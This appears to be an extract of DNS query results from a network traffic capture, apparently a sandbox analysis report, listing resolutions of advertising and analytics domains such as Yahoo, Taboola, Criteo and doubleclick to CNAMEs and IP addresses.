                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.759008884 CEST1.1.1.1192.168.2.40x2750No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.759008884 CEST1.1.1.1192.168.2.40x2750No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.759008884 CEST1.1.1.1192.168.2.40x2750No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:13.759569883 CEST1.1.1.1192.168.2.40x6c37No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com3.120.11.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com18.195.28.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com52.28.199.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com52.57.182.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com3.124.241.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:14.279086113 CEST1.1.1.1192.168.2.40x83feNo error (0)exchange.mediavine.com3.76.245.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.688620090 CEST1.1.1.1192.168.2.40xbcfdNo error (0)pix.spot.imk8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.688620090 CEST1.1.1.1192.168.2.40xbcfdNo error (0)k8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.com3.219.229.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.688620090 CEST1.1.1.1192.168.2.40xbcfdNo error (0)k8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.com107.23.253.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.688620090 CEST1.1.1.1192.168.2.40xbcfdNo error (0)k8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.com52.0.79.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.688620090 CEST1.1.1.1192.168.2.40xbcfdNo error (0)k8s-kongow-monitorp-157cd18d00-964647605.us-east-1.elb.amazonaws.com34.233.200.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:19.707789898 CEST1.1.1.1192.168.2.40x7835No error (0)pix.spot.imk8s-kongow-monitorp-e03b5a49ad-1517292392.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.851289988 CEST1.1.1.1192.168.2.40xb14bNo error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.851289988 CEST1.1.1.1192.168.2.40xb14bNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.851289988 CEST1.1.1.1192.168.2.40xb14bNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.851289988 CEST1.1.1.1192.168.2.40xb14bNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.851289988 CEST1.1.1.1192.168.2.40xb14bNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:23.852768898 CEST1.1.1.1192.168.2.40xf0d7No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:24.363615036 CEST1.1.1.1192.168.2.40x6f4cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:24.364064932 CEST1.1.1.1192.168.2.40x90e4No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:37.520060062 CEST1.1.1.1192.168.2.40x3942No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:37.520347118 CEST1.1.1.1192.168.2.40x44fNo error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:37.520347118 CEST1.1.1.1192.168.2.40x44fNo error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:38.598278046 CEST1.1.1.1192.168.2.40xc30aNo error (0)csm.nl3.eu.criteo.netcsm.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:38.598278046 CEST1.1.1.1192.168.2.40xc30aNo error (0)csm.nl3.vip.prod.criteo.net178.250.1.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:38.600944042 CEST1.1.1.1192.168.2.40xc919No error (0)csm.nl3.eu.criteo.netcsm.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:41.456957102 CEST1.1.1.1192.168.2.40xae45No error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:22:41.459845066 CEST1.1.1.1192.168.2.40x60adNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.658845901 CEST1.1.1.1192.168.2.40x8f64No error (0)prebid.media.net34.120.63.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.663758993 CEST1.1.1.1192.168.2.40xe433No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.663932085 CEST1.1.1.1192.168.2.40xcabNo error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.663932085 CEST1.1.1.1192.168.2.40xcabNo error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.663932085 CEST1.1.1.1192.168.2.40xcabNo error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.663932085 CEST1.1.1.1192.168.2.40xcabNo error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.674117088 CEST1.1.1.1192.168.2.40xa7e4No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.674117088 CEST1.1.1.1192.168.2.40xa7e4No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.674117088 CEST1.1.1.1192.168.2.40xa7e4No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.674117088 CEST1.1.1.1192.168.2.40xa7e4No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.674117088 CEST1.1.1.1192.168.2.40xa7e4No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.675201893 CEST1.1.1.1192.168.2.40x945No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.687819958 CEST1.1.1.1192.168.2.40x2181No error (0)htlb.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.687819958 CEST1.1.1.1192.168.2.40x2181No error (0)htlb.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.688864946 CEST1.1.1.1192.168.2.40x9a5aNo error (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.194.52.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.31.240.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com54.75.182.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.34.124.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.81.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.49.117.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.692164898 CEST1.1.1.1192.168.2.40xf26eNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.50.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.694291115 CEST1.1.1.1192.168.2.40x44fdNo error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.694291115 CEST1.1.1.1192.168.2.40x44fdNo error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.696451902 CEST1.1.1.1192.168.2.40x7262No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.696451902 CEST1.1.1.1192.168.2.40x7262No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.696451902 CEST1.1.1.1192.168.2.40x7262No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.697833061 CEST1.1.1.1192.168.2.40x5da5No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud3.251.108.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.154.40.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.171.151.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.212.106.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.215.101.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.698297024 CEST1.1.1.1192.168.2.40x47caNo error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud99.81.68.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:08.700239897 CEST1.1.1.1192.168.2.40x4feNo error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.528964043 CEST1.1.1.1192.168.2.40xc4f7No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.528964043 CEST1.1.1.1192.168.2.40xc4f7No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.528964043 CEST1.1.1.1192.168.2.40xc4f7No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.528964043 CEST1.1.1.1192.168.2.40xc4f7No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.528964043 CEST1.1.1.1192.168.2.40xc4f7No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.529313087 CEST1.1.1.1192.168.2.40xdeeNo error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.712532043 CEST1.1.1.1192.168.2.40xb2deNo error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.712754965 CEST1.1.1.1192.168.2.40x4413No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.828044891 CEST1.1.1.1192.168.2.40xbb59No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.828491926 CEST1.1.1.1192.168.2.40x4b6No error (0)tlx.3lift.comeu-tlx.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.828491926 CEST1.1.1.1192.168.2.40x4b6No error (0)eu-tlx.3lift.com3.78.168.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.828491926 CEST1.1.1.1192.168.2.40x4b6No error (0)eu-tlx.3lift.com3.124.64.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:09.828491926 CEST1.1.1.1192.168.2.40x4b6No error (0)eu-tlx.3lift.com18.157.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167057037 CEST1.1.1.1192.168.2.40xd6c1No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167057037 CEST1.1.1.1192.168.2.40xd6c1No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.171.151.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud3.251.108.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.212.106.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.154.40.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.215.101.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.167226076 CEST1.1.1.1192.168.2.40x90b7No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud99.81.68.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.175404072 CEST1.1.1.1192.168.2.40x28f8No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.175404072 CEST1.1.1.1192.168.2.40x28f8No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.175404072 CEST1.1.1.1192.168.2.40x28f8No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:10.175921917 CEST1.1.1.1192.168.2.40xb8bcNo error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.89.9.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.75.86.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.89.9.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.89.9.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.38.120.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.721278906 CEST1.1.1.1192.168.2.40x7466No error (0)onetag-sys.com51.89.9.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.726066113 CEST1.1.1.1192.168.2.40xff65No error (0)trace.mediago.io35.208.249.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.843777895 CEST1.1.1.1192.168.2.40x93a0No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.843777895 CEST1.1.1.1192.168.2.40x93a0No error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:11.845036030 CEST1.1.1.1192.168.2.40x5460No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.048229933 CEST1.1.1.1192.168.2.40x2406No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.048784971 CEST1.1.1.1192.168.2.40x8fafNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.048784971 CEST1.1.1.1192.168.2.40x8fafNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.048784971 CEST1.1.1.1192.168.2.40x8fafNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.257689953 CEST1.1.1.1192.168.2.40x5c44No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.257858038 CEST1.1.1.1192.168.2.40xe207No error (0)securepubads.g.doubleclick.net142.250.185.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:12.506455898 CEST1.1.1.1192.168.2.40x47baNo error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.014400005 CEST1.1.1.1192.168.2.40x5464No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.014400005 CEST1.1.1.1192.168.2.40x5464No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.014400005 CEST1.1.1.1192.168.2.40x5464No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.016309977 CEST1.1.1.1192.168.2.40x2f2bNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.114746094 CEST1.1.1.1192.168.2.40xca89No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.115034103 CEST1.1.1.1192.168.2.40xb1e2No error (0)contextual.media.net88.221.168.23A (IP address)IN (0x0001)false
